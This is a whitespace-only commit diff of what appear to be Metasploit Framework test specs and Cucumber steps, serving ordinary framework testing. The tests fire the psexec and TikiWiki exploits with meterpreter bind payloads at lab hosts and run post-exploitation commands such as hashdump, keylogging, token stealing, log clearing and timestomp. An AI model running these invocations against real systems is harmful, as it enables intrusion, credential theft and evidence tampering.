Retab all the things (except external/)

Tab Assassin
2013-09-30 13:47:53 -05:00
parent 0ecba377f5
commit 2e8d19edcf
293 changed files with 32962 additions and 32962 deletions
+20 -20
@@ -1,31 +1,31 @@
#This is the step definition file for common framework testing steps or meta steps
When /^I run the "([^"]*)" exploit with standard target options$/ do |exploit|
steps %Q{
When I run `#{exploit} RHOST=#{TestConfig.instance.rhost} SMBPass=#{TestConfig.instance.smbpass} SMBUser=#{TestConfig.instance.smbuser} E` interactively
}
end
steps %Q{
When I run `#{exploit} RHOST=#{TestConfig.instance.rhost} SMBPass=#{TestConfig.instance.smbpass} SMBUser=#{TestConfig.instance.smbuser} E` interactively
}
end
When /^I run the "([^"]*)" exploit with standard target options in check mode$/ do |exploit|
steps %Q{
When I run `#{exploit} RHOST=#{TestConfig.instance.rhost} SMBPass=#{TestConfig.instance.smbpass} SMBUser=#{TestConfig.instance.smbuser} C` interactively
}
end
steps %Q{
When I run `#{exploit} RHOST=#{TestConfig.instance.rhost} SMBPass=#{TestConfig.instance.smbpass} SMBUser=#{TestConfig.instance.smbuser} C` interactively
}
end
When /^I run msfvenom to encode for windows using the "([^"]*)" encoder with "(.*)" options$/ do |encoder, options|
steps %Q{
When I run `./msfvenom ./msfvenom -p windows/shell/bind_tcp -e #{encoder} #{options}` interactively
}
end
steps %Q{
When I run `./msfvenom ./msfvenom -p windows/shell/bind_tcp -e #{encoder} #{options}` interactively
}
end
When /^I run msfvenom to encode for windows using the "([^"]*)" encoder with "(.*)" options and a buffer register$/ do |encoder, options|
steps %Q{
When I run `./msfvenom ./msfvenom -p windows/shell/bind_tcp -e #{encoder} #{options} BufferRegister=eax` interactively
}
end
steps %Q{
When I run `./msfvenom ./msfvenom -p windows/shell/bind_tcp -e #{encoder} #{options} BufferRegister=eax` interactively
}
end
When /^I run msfpayload to generate a "([^"]*)" on the local host$/ do |payload|
steps %Q{
When I run `./msfpayload #{payload} LHOST=127.0.0.1 y`
}
end
steps %Q{
When I run `./msfpayload #{payload} LHOST=127.0.0.1 y`
}
end
+7 -7
@@ -1,14 +1,14 @@
#This is the step definition file for cucumber features relating to the framework handler feature
Given /^I launch the exploit multi handler$/ do
steps %Q{
When I run `./msfcli exploit/multi/handler E`
Then the output should contain "Please wait while we load the module tree..."
Then the output should contain "Started reverse handler on"
Then the output should contain "Starting the payload handler..."
steps %Q{
When I run `./msfcli exploit/multi/handler E`
Then the output should contain "Please wait while we load the module tree..."
Then the output should contain "Started reverse handler on"
Then the output should contain "Starting the payload handler..."
}
}
end
Given /^I launch the generic multi handler$/ do
+7 -7
@@ -5,18 +5,18 @@ require 'aruba/cucumber'
require_relative 'test_config'
Before do
# Automatically find the framework path
default_path = File.join(File.expand_path(File.dirname(__FILE__)), '../../../')
# Automatically find the framework path
default_path = File.join(File.expand_path(File.dirname(__FILE__)), '../../../')
# Add more paths manually if needed. For example:
# "/Users/gary/rapid7/framework"
@dirs = [default_path]
# Add more paths manually if needed. For example:
# "/Users/gary/rapid7/framework"
@dirs = [default_path]
@aruba_timeout_seconds = 150
@aruba_timeout_seconds = 150
end
Before('@slow_process') do
@aruba_io_wait_seconds = 150
@aruba_io_wait_seconds = 150
end
@After
+8 -8
@@ -6,18 +6,18 @@ class TestConfig
def initialize(*args)
yml_path = File.join(File.dirname(__FILE__),'test_config.yml')
yml_path = File.join(File.dirname(__FILE__),'test_config.yml')
if File.exists?(yml_path)
@yaml_options = YAML::load(File.open(yml_path))
else
@yaml_options = {}
end
if File.exists?(yml_path)
@yaml_options = YAML::load(File.open(yml_path))
else
@yaml_options = {}
end
@options = {
"rhost" => "localhost",
"smbuser" => "user",
"smbpass" => "password"
"smbuser" => "user",
"smbpass" => "password"
}
end
+157 -157
@@ -17,195 +17,195 @@ include MsfTest::MsfMatchers
## This spec exists to help us describe the behavior of msfconsole - TODO
describe "Msfconsole" do
###
# Setup!
###
before :all do
@working_directory = File.dirname(__FILE__)
###
# Setup!
###
before :all do
@working_directory = File.dirname(__FILE__)
## Static specs will make use of RC files here
@static_resource_directory = "#{@working_directory}/msftest/resource"
## Static specs will make use of RC files here
@static_resource_directory = "#{@working_directory}/msftest/resource"
## Directories for the generated specs
@temp_directory = "#{@working_directory}/msfconsole_specs"
@temp_input_directory = "#{@temp_directory}/generated_rc"
## Directories for the generated specs
@temp_directory = "#{@working_directory}/msfconsole_specs"
@temp_input_directory = "#{@temp_directory}/generated_rc"
## Where all output from the runs will go
@temp_output_directory = "#{@temp_directory}/output"
## Where all output from the runs will go
@temp_output_directory = "#{@temp_directory}/output"
## Create a framework object
@framework = ::Msf::Simple::Framework.create
end
## Create a framework object
@framework = ::Msf::Simple::Framework.create
end
before :each do
end
before :each do
end
after :each do
end
after :each do
end
after :all do
## Clean up
#FileUtils.rm_rf(@temp_directory)
end
after :all do
## Clean up
#FileUtils.rm_rf(@temp_directory)
end
###
# Static Test cases!
###
###
# Static Test cases!
###
it "should start and let us run help" do
data = start_console_and_run_rc("help","#{@static_resource_directory}/help.rc")
success_strings = [ 'help',
'Database Backend Commands',
'Core Commands' ]
failure_strings = [] | generic_failure_strings
failure_exception_strings = [] | generic_failure_exception_strings
it "should start and let us run help" do
data = start_console_and_run_rc("help","#{@static_resource_directory}/help.rc")
success_strings = [ 'help',
'Database Backend Commands',
'Core Commands' ]
failure_strings = [] | generic_failure_strings
failure_exception_strings = [] | generic_failure_exception_strings
data.should contain_all_successes(success_strings)
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
end
data.should contain_all_successes(success_strings)
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
end
it "should generate a meterpreter session against a vulnerable win32 host" do
## Set input & output to something sane
input = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::File.new("temp.output")
session = generate_x86_meterpreter_session(input, output)
it "should generate a meterpreter session against a vulnerable win32 host" do
## Set input & output to something sane
input = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::File.new("temp.output")
session = generate_x86_meterpreter_session(input, output)
session.should_not be_nil
if session
session.load_stdapi
session.run_cmd("help")
else
flunk "Error interacting with session"
end
end
###
# Dynamic Test Cases!!
###
session.should_not be_nil
if session
session.load_stdapi
session.run_cmd("help")
else
flunk "Error interacting with session"
end
end
###
# Dynamic Test Cases!!
###
@working_directory = File.dirname(__FILE__)
@working_directory = File.dirname(__FILE__)
## Directories for the generated specs
@temp_directory = "#{@working_directory}/msfconsole_specs"
@temp_input_directory = "#{@temp_directory}/generated_rc"
## Directories for the generated specs
@temp_directory = "#{@working_directory}/msfconsole_specs"
@temp_input_directory = "#{@temp_directory}/generated_rc"
## Where all output from the runs will go
@temp_output_directory = "#{@temp_directory}/output"
## Where all output from the runs will go
@temp_output_directory = "#{@temp_directory}/output"
if File.directory? @temp_directory
FileUtils.rm_rf(@temp_directory)
end
if File.directory? @temp_directory
FileUtils.rm_rf(@temp_directory)
end
Dir.mkdir(@temp_directory)
Dir.mkdir(@temp_input_directory)
Dir.mkdir(@temp_output_directory)
Dir.glob("#{@working_directory}/msftest/*.msftest").each do |filename|
## Parse this test case
test_case = MsfTestCase.new(filename)
puts "Found #{test_case.name} in: #{filename}"
Dir.mkdir(@temp_directory)
Dir.mkdir(@temp_input_directory)
Dir.mkdir(@temp_output_directory)
Dir.glob("#{@working_directory}/msftest/*.msftest").each do |filename|
## Parse this test case
test_case = MsfTestCase.new(filename)
puts "Found #{test_case.name} in: #{filename}"
## Write the commands back to a temporary RC file
puts "Writing #{@temp_input_directory}/#{test_case.name}.rc"
File.open("#{@temp_input_directory}/#{test_case.name}.rc", 'w') { |f| f.puts test_case.commands }
## Create the rspec Test Case
it "should #{test_case.name}" do
## Gather the success / failure strings, and combine with the generics
success_strings = test_case.expected_successes
failure_strings = test_case.expected_failures | generic_failure_strings
failure_exception_strings = test_case.expected_failure_exceptions | generic_failure_exception_strings
## run the commands
data = start_console_and_run_rc( test_case.name, "#{@temp_input_directory}/#{test_case.name}.rc")
## check the output
data.should contain_all_successes(success_strings)
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
## Clean up
#File.delete("#{@temp_input_directory}/#{test_case.name}.rc")
#File.delete("#{@temp_output_directory}/#{test_case.name}")
end
end
## Write the commands back to a temporary RC file
puts "Writing #{@temp_input_directory}/#{test_case.name}.rc"
File.open("#{@temp_input_directory}/#{test_case.name}.rc", 'w') { |f| f.puts test_case.commands }
## Create the rspec Test Case
it "should #{test_case.name}" do
## Gather the success / failure strings, and combine with the generics
success_strings = test_case.expected_successes
failure_strings = test_case.expected_failures | generic_failure_strings
failure_exception_strings = test_case.expected_failure_exceptions | generic_failure_exception_strings
## run the commands
data = start_console_and_run_rc( test_case.name, "#{@temp_input_directory}/#{test_case.name}.rc")
## check the output
data.should contain_all_successes(success_strings)
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
## Clean up
#File.delete("#{@temp_input_directory}/#{test_case.name}.rc")
#File.delete("#{@temp_output_directory}/#{test_case.name}")
end
end
###
# Test case helpers:
###
def generic_success_strings
[]
end
def generic_failure_strings
['fatal', 'fail', 'error', 'exception']
end
def generic_failure_exception_strings
[]
end
###
# Test case helpers:
###
def generic_success_strings
[]
end
def generic_failure_strings
['fatal', 'fail', 'error', 'exception']
end
def generic_failure_exception_strings
[]
end
def start_console_and_run_rc(name,rc_file, database_file=false)
output_file = "#{@temp_output_directory}/#{name}"
def start_console_and_run_rc(name,rc_file, database_file=false)
output_file = "#{@temp_output_directory}/#{name}"
if database_file
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file} -y #{database_file}"
else
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file}"
end
system("#{msfconsole_string}")
if database_file
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file} -y #{database_file}"
else
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file}"
end
system("#{msfconsole_string}")
data = hlp_file_to_string("#{output_file}")
end
data = hlp_file_to_string("#{output_file}")
end
def generate_x86_meterpreter_session(input, output)
## Setup for win32
exploit_name = 'windows/smb/psexec'
payload_name = 'windows/meterpreter/bind_tcp'
## Fire it off against a known-vulnerable host
session = @framework.exploits.create(exploit_name).exploit_simple(
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
'Payload' => payload_name,
'LocalInput' => input,
'LocalOutput' => output)
## Setup for win32
exploit_name = 'windows/smb/psexec'
payload_name = 'windows/meterpreter/bind_tcp'
## Fire it off against a known-vulnerable host
session = @framework.exploits.create(exploit_name).exploit_simple(
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
'Payload' => payload_name,
'LocalInput' => input,
'LocalOutput' => output)
## If a session came back, try to interact with it.
if session
return session
else
return nil
end
end
## If a session came back, try to interact with it.
if session
return session
else
return nil
end
end
def generate_win64_meterpreter_session(input, output)
raise "Not Implemented"
end
raise "Not Implemented"
end
def generate_java_meterpreter_session(input, output)
raise "Not Implemented"
end
raise "Not Implemented"
end
def generate_php_meterpreter_session(input, output)
raise "Not Implemented"
end
raise "Not Implemented"
end
def hlp_file_to_string(filename)
data = ""
f = File.open(filename, "r")
f.each_line do |line|
data += line
end
return data
end
def hlp_file_to_string(filename)
data = ""
f = File.open(filename, "r")
f.each_line do |line|
data += line
end
return data
end
end
end
@@ -1,19 +1,19 @@
module MsfTest
module JavaMeterpreterSpecs
## This file is intended to be used in conjunction with a harness,
## such as meterpreter_win32_spec.rb
## This file is intended to be used in conjunction with a harness,
## such as meterpreter_win32_spec.rb
def self.included(base)
def self.included(base)
base.class_eval do
it "should not error when taking a screenshot" do
success_strings = [ 'Screenshot saved to' ]
hlp_run_command_check_output("screenshot","screenshot", success_strings)
end
end
end
it "should not error when taking a screenshot" do
success_strings = [ 'Screenshot saved to' ]
hlp_run_command_check_output("screenshot","screenshot", success_strings)
end
end
end
end
end
@@ -10,83 +10,83 @@ require 'meterpreter_specs'
module MsfTest
describe "JavaMeterpreter" do
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the specs that are specific to the java
# meterpreter
include MsfTest::JavaMeterpreterSpecs
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the specs that are specific to the java
# meterpreter
include MsfTest::JavaMeterpreterSpecs
before :all do
@verbose = true
@meterpreter_type = "java"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
before :all do
@verbose = true
@meterpreter_type = "java"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
create_session_java
end
create_session_java
end
before :each do
before :each do
end
end
after :each do
@session.init_ui(@input, @output)
end
after :all do
#FileUtils.rm_rf("*.jpeg")
#FileUtils.rm_rf("payload.jar")
FileUtils.rm_rf(@output_directory)
end
after :each do
@session.init_ui(@input, @output)
end
after :all do
#FileUtils.rm_rf("*.jpeg")
#FileUtils.rm_rf("payload.jar")
FileUtils.rm_rf(@output_directory)
end
def create_session_java
def create_session_java
## Setup for win32
@framework = Msf::Simple::Framework.create
test_modules_path = File.join(File.dirname(__FILE__), '..', '..', 'modules')
@framework.modules.add_module_path(test_modules_path)
@exploit_name = 'test/java_tester'
@payload_name = 'java/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
## Setup for win32
@framework = Msf::Simple::Framework.create
test_modules_path = File.join(File.dirname(__FILE__), '..', '..', 'modules')
@framework.modules.add_module_path(test_modules_path)
@exploit_name = 'test/java_tester'
@payload_name = 'java/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
puts @session.inspect
puts @session.inspect
## If a session came back, try to interact with it.
if @session
@session.load_stdapi
else
raise Exception "Couldn't get a session!"
end
end
## If a session came back, try to interact with it.
if @session
@session.load_stdapi
else
raise Exception "Couldn't get a session!"
end
end
end
end
@@ -10,74 +10,74 @@ require 'meterpreter_specs'
module MsfTest
describe "PhpMeterpreter" do
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
before :all do
@verbose = true
@meterpreter_type = "php"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
before :all do
@verbose = true
@meterpreter_type = "php"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
create_session_php
end
create_session_php
end
before :each do
before :each do
end
end
after :each do
@session.init_ui(@input, @output)
end
after :all do
FileUtils.rm_rf(@output_directory)
end
after :each do
@session.init_ui(@input, @output)
end
after :all do
FileUtils.rm_rf(@output_directory)
end
def create_session_php
def create_session_php
## Setup for php
@framework = Msf::Simple::Framework.create
@exploit_name = 'unix/webapp/tikiwiki_graph_formula_exec'
@payload_name = 'php/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
## Setup for php
@framework = Msf::Simple::Framework.create
@exploit_name = 'unix/webapp/tikiwiki_graph_formula_exec'
@payload_name = 'php/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {'RHOST' => "metasploitable"},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {'RHOST' => "metasploitable"},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
puts @session.inspect
puts @session.inspect
## If a session came back, try to interact with it.
if @session
@session.load_stdapi
else
raise Exception "Couldn't get a session!"
end
end
## If a session came back, try to interact with it.
if @session
@session.load_stdapi
else
raise Exception "Couldn't get a session!"
end
end
end
end
@@ -1,58 +1,58 @@
module MsfTest
module MeterpreterSpecHelper
def self.included(base)
def self.included(base)
base.class_eval do
def generic_failure_strings
['fail', 'error', 'exception']
end
def generic_failure_exception_strings
['nserror.dll', 'tiki-error.php','tiki-error_simple.php','tiki-rss_error.php'] ##ugh, this is dependent on the target
end
def generic_failure_strings
['fail', 'error', 'exception']
end
def generic_failure_exception_strings
['nserror.dll', 'tiki-error.php','tiki-error_simple.php','tiki-rss_error.php'] ##ugh, this is dependent on the target
end
def hlp_run_command_check_output(name,command,success_strings=[],fail_strings=[], fail_exception_strings=[])
def hlp_run_command_check_output(name,command,success_strings=[],fail_strings=[], fail_exception_strings=[])
fail_strings = fail_strings | generic_failure_strings
fail_exception_strings = fail_exception_strings | generic_failure_exception_strings
fail_strings = fail_strings | generic_failure_strings
fail_exception_strings = fail_exception_strings | generic_failure_exception_strings
temp_command_file = "#{@output_directory}/#{name}"
command_output = Rex::Ui::Text::Output::File.new(temp_command_file)
@session.init_ui(@input, command_output)
command_output.print_line("meterpreter_functional_test_start")
if @verbose
puts "Running Command: " + command
end
@session.run_cmd(command)
command_output.print_line("meterpreter_functional_test_end")
data = hlp_file_to_string(temp_command_file)
data.should contain_a_complete_test
data.should contain_all_successes
data.should contain_no_failures_except
end
def hlp_file_to_string(filename)
data = ""
f = File.open(filename, "r")
f.each_line do |line|
data += line
end
return data
end
def hlp_string_to_file(string, filepath)
# Create a new file and write to it
File.open(filepath, 'w') do |f2|
f2.puts string
end
end
end
end
temp_command_file = "#{@output_directory}/#{name}"
command_output = Rex::Ui::Text::Output::File.new(temp_command_file)
@session.init_ui(@input, command_output)
command_output.print_line("meterpreter_functional_test_start")
if @verbose
puts "Running Command: " + command
end
@session.run_cmd(command)
command_output.print_line("meterpreter_functional_test_end")
data = hlp_file_to_string(temp_command_file)
data.should contain_a_complete_test
data.should contain_all_successes
data.should contain_no_failures_except
end
def hlp_file_to_string(filename)
data = ""
f = File.open(filename, "r")
f.each_line do |line|
data += line
end
return data
end
def hlp_string_to_file(string, filepath)
# Create a new file and write to it
File.open(filepath, 'w') do |f2|
f2.puts string
end
end
end
end
end
end
@@ -1,108 +1,108 @@
module MsfTest
module MeterpreterSpecs
def self.included(base)
def self.included(base)
base.class_eval do
it "should not error when running each command" do
commands = [ "?",
"background",
"bgkill",
"bglist",
"bgrun",
"channel",
"close",
"exit",
"help",
"interact",
#"irb",
"migrate",
#"quit",
"read",
"run",
"use",
"write",
"cat",
"cd",
"del",
"download",
#"edit",
"getlwd",
"getwd",
"lcd",
"lpwd",
"ls",
"mkdir",
"pwd",
"rm",
"rmdir",
"search",
"upload",
"ipconfig",
"portfwd",
"route",
"clearev",
"drop_token",
"execute",
"getpid",
"getprivs",
"getuid",
"kill",
"ps",
#"reboot",
"reg",
"rev2self",
#"shell",
#"shutdown",
"steal_token",
"sysinfo",
"enumdesktops",
"getdesktop",
"idletime",
"keyscan_dump",
"keyscan_start",
"keyscan_stop",
"screenshot",
"setdesktop",
"uictl",
"getsystem",
"hashdump",
"timestomp"
]
it "should not error when running each command" do
commands = [ "?",
"background",
"bgkill",
"bglist",
"bgrun",
"channel",
"close",
"exit",
"help",
"interact",
#"irb",
"migrate",
#"quit",
"read",
"run",
"use",
"write",
"cat",
"cd",
"del",
"download",
#"edit",
"getlwd",
"getwd",
"lcd",
"lpwd",
"ls",
"mkdir",
"pwd",
"rm",
"rmdir",
"search",
"upload",
"ipconfig",
"portfwd",
"route",
"clearev",
"drop_token",
"execute",
"getpid",
"getprivs",
"getuid",
"kill",
"ps",
#"reboot",
"reg",
"rev2self",
#"shell",
#"shutdown",
"steal_token",
"sysinfo",
"enumdesktops",
"getdesktop",
"idletime",
"keyscan_dump",
"keyscan_start",
"keyscan_stop",
"screenshot",
"setdesktop",
"uictl",
"getsystem",
"hashdump",
"timestomp"
]
## Run each command, check for execeptions
commands.each do |command|
hlp_run_command_check_output("basic_#{command}",command)
end
end
## Run each command, check for execeptions
commands.each do |command|
hlp_run_command_check_output("basic_#{command}",command)
end
end
it "should not error when running help" do
success_strings = [ 'Core Commands',
'Stdapi: File system Commands',
'Stdapi: Networking Commands',
'Stdapi: System Commands',
'Stdapi: User interface Commands']
hlp_run_command_check_output("help","help", success_strings)
end
it "should not error when running the help shortcut" do
success_strings = [ 'Core Commands',
'Stdapi: File system Commands',
'Stdapi: Networking Commands',
'Stdapi: System Commands',
'Stdapi: User interface Commands' ]
hlp_run_command_check_output("help_shortcut","?", success_strings)
end
it "should not error when checking for background channels" do
success_strings = [ 'No active channels.' ]
hlp_run_command_check_output("channel_list_empty","channel -l", success_strings)
end
end
end
it "should not error when running help" do
success_strings = [ 'Core Commands',
'Stdapi: File system Commands',
'Stdapi: Networking Commands',
'Stdapi: System Commands',
'Stdapi: User interface Commands']
hlp_run_command_check_output("help","help", success_strings)
end
it "should not error when running the help shortcut" do
success_strings = [ 'Core Commands',
'Stdapi: File system Commands',
'Stdapi: Networking Commands',
'Stdapi: System Commands',
'Stdapi: User interface Commands' ]
hlp_run_command_check_output("help_shortcut","?", success_strings)
end
it "should not error when checking for background channels" do
success_strings = [ 'No active channels.' ]
hlp_run_command_check_output("channel_list_empty","channel -l", success_strings)
end
end
end
end
end
@@ -14,91 +14,91 @@ module MsfTest
describe "Win32Meterpreter" do
# Include Custom Matchers
include MsfTest::MsfMatchers
# Include Custom Matchers
include MsfTest::MsfMatchers
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the specs that are specific to the
# windows meterpreter platforms
include MsfTest::WindowsMeterpreterSpecs
# This include brings in all the specs that are specific to the
# windows meterpreter platforms
include MsfTest::WindowsMeterpreterSpecs
before :all do
@verbose = true
@meterpreter_type = "win32"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
before :all do
@verbose = true
@meterpreter_type = "win32"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
create_session_windows_x32
end
create_session_windows_x32
end
before :each do
before :each do
end
end
after :each do
@session.init_ui(@input, @output)
end
after :each do
@session.init_ui(@input, @output)
end
after :all do
## Clean up test output
FileUtils.rm_rf(@output_directory)
after :all do
## Clean up test output
FileUtils.rm_rf(@output_directory)
## Screenshot command leaves .jpegs :(
## TODO - fix the meterpreter command to write to
## TODO - an arbitrary file.
Dir.new(File.dirname(__FILE__)).each do |file|
if file =~ /.jpeg/
File.delete(file)
end
end
end
def create_session_windows_x32
## Screenshot command leaves .jpegs :(
## TODO - fix the meterpreter command to write to
## TODO - an arbitrary file.
Dir.new(File.dirname(__FILE__)).each do |file|
if file =~ /.jpeg/
File.delete(file)
end
end
end
def create_session_windows_x32
## Setup for win32
@framework = Msf::Simple::Framework.create
@exploit_name = 'windows/smb/psexec'
@payload_name = 'windows/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
## Setup for win32
@framework = Msf::Simple::Framework.create
@exploit_name = 'windows/smb/psexec'
@payload_name = 'windows/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
## If a session came back, try to interact with it.
if @session
puts "got a session"
@session.load_stdapi
else
puts "unable to get session"
#flunk "Couldn't get a session!"
end
end
## If a session came back, try to interact with it.
if @session
puts "got a session"
@session.load_stdapi
else
puts "unable to get session"
#flunk "Couldn't get a session!"
end
end
end
end
@@ -1,49 +1,49 @@
module MsfTest
module WindowsMeterpreterSpecs
## This file is intended to be used in conjunction with a harness,
## such as meterpreter_win32_spec.rb
## This file is intended to be used in conjunction with a harness,
## such as meterpreter_win32_spec.rb
def self.included(base)
def self.included(base)
base.class_eval do
it "should not error when uploading a file to a windows box" do
upload_success_strings = [ 'uploading',
'uploaded' ]
it "should not error when uploading a file to a windows box" do
upload_success_strings = [ 'uploading',
'uploaded' ]
## create a file to upload
filename = "/tmp/whatever"
if File.exist?(filename)
FileUtils.rm(filename)
end
hlp_string_to_file("owned!", filename)
## create a file to upload
filename = "/tmp/whatever"
if File.exist?(filename)
FileUtils.rm(filename)
end
hlp_string_to_file("owned!", filename)
## run the upload / quit commands
hlp_run_command_check_output("upload","upload #{filename} C:\\", upload_success_strings)
#hlp_run_command_check_output("quit","quit")
## run the upload / quit commands
hlp_run_command_check_output("upload","upload #{filename} C:\\", upload_success_strings)
#hlp_run_command_check_output("quit","quit")
## clean up
FileUtils.rm(filename)
end
it "should show the priv commands when running help" do
success_strings = ['Priv: Elevate Commands',
'Priv: Password database Commands',
'Priv: Timestomp Commands' ]
hlp_run_command_check_output("help_shortcut","help", success_strings)
## clean up
FileUtils.rm(filename)
end
it "should show the priv commands when running help" do
success_strings = ['Priv: Elevate Commands',
'Priv: Password database Commands',
'Priv: Timestomp Commands' ]
hlp_run_command_check_output("help_shortcut","help", success_strings)
end
it "should not error when taking a screenshot" do
success_strings = [ 'Screenshot saved to' ]
hlp_run_command_check_output("screenshot","screenshot", success_strings)
end
end
end
end
it "should not error when taking a screenshot" do
success_strings = [ 'Screenshot saved to' ]
hlp_run_command_check_output("screenshot","screenshot", success_strings)
end
end
end
end
end
+8 -8
@@ -1,10 +1,10 @@
class Array
@@to_s_reported = {}
def to_s(*args)
if(not @@to_s_reported[caller[0].to_s])
$stderr.puts "HOOK: Array#to_s at #{caller.join("\t")}"
@@to_s_reported[caller[0].to_s] = true
end
super(*args)
end
@@to_s_reported = {}
def to_s(*args)
if(not @@to_s_reported[caller[0].to_s])
$stderr.puts "HOOK: Array#to_s at #{caller.join("\t")}"
@@to_s_reported[caller[0].to_s] = true
end
super(*args)
end
end
+9 -9
@@ -1,11 +1,11 @@
class String
@@idx_reported = {}
def [](*args)
if(args.length == 1 and args[0].class == ::Fixnum and not @@idx_reported[caller[0].to_s])
$stderr.puts "HOOK: String[idx] #{caller.join("\t")}\n\n"
@@idx_reported[caller[0].to_s] = true
end
slice(*args)
end
@@idx_reported = {}
def [](*args)
if(args.length == 1 and args[0].class == ::Fixnum and not @@idx_reported[caller[0].to_s])
$stderr.puts "HOOK: String[idx] #{caller.join("\t")}\n\n"
@@idx_reported[caller[0].to_s] = true
end
slice(*args)
end
end
+49 -49
@@ -3,66 +3,66 @@
module Msf
module ModuleTest
attr_accessor :tests
attr_accessor :failures
attr_accessor :tests
attr_accessor :failures
def initialize(info={})
@tests = 0
@failures = 0
super
end
def initialize(info={})
@tests = 0
@failures = 0
super
end
def run_all_tests
tests = self.methods.select { |m| m.to_s =~ /^test_/ }
tests.each { |test_method|
self.send(test_method)
}
def run_all_tests
tests = self.methods.select { |m| m.to_s =~ /^test_/ }
tests.each { |test_method|
self.send(test_method)
}
end
end
def it(msg="", &block)
@tests += 1
begin
result = block.call
unless result
print_error("FAILED: #{msg}")
print_error("FAILED: #{error}") if error
@failures += 1
return
end
rescue ::Exception => e
print_error("FAILED: #{msg}")
print_error("Exception: #{e.class} : #{e}")
dlog("Exception in testing - #{msg}")
dlog("Call stack: #{e.backtrace.join("\n")}")
return
end
